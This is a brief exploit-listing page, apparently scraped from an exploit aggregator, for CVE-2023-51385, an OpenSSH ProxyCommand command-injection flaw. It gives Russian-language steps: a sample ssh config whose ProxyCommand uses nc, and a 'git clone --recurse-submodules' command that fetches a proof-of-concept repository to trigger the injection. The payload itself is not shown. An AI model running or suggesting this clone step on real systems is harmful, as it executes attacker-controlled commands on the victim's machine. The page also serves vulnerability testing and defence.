Exploit for CVE-2023-51385
Exploit Code
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-LE1A-CVE-2023-51385
# CVE-2023-51385
OpenSSH ProxyCommand RCE
1. Если ваш ProxyCommand настроен следующим образом:
root@kitploit:~
Host *.com
ProxyCommand /usr/bin/nc -X connect -x 127.0.0.1:7890 %h %p
2. Используйте следующую команду для подтверждения концепции:
root@kitploit:~
git clone https://github.com/Le1a/CVE-2023-51385 --recurse-submodules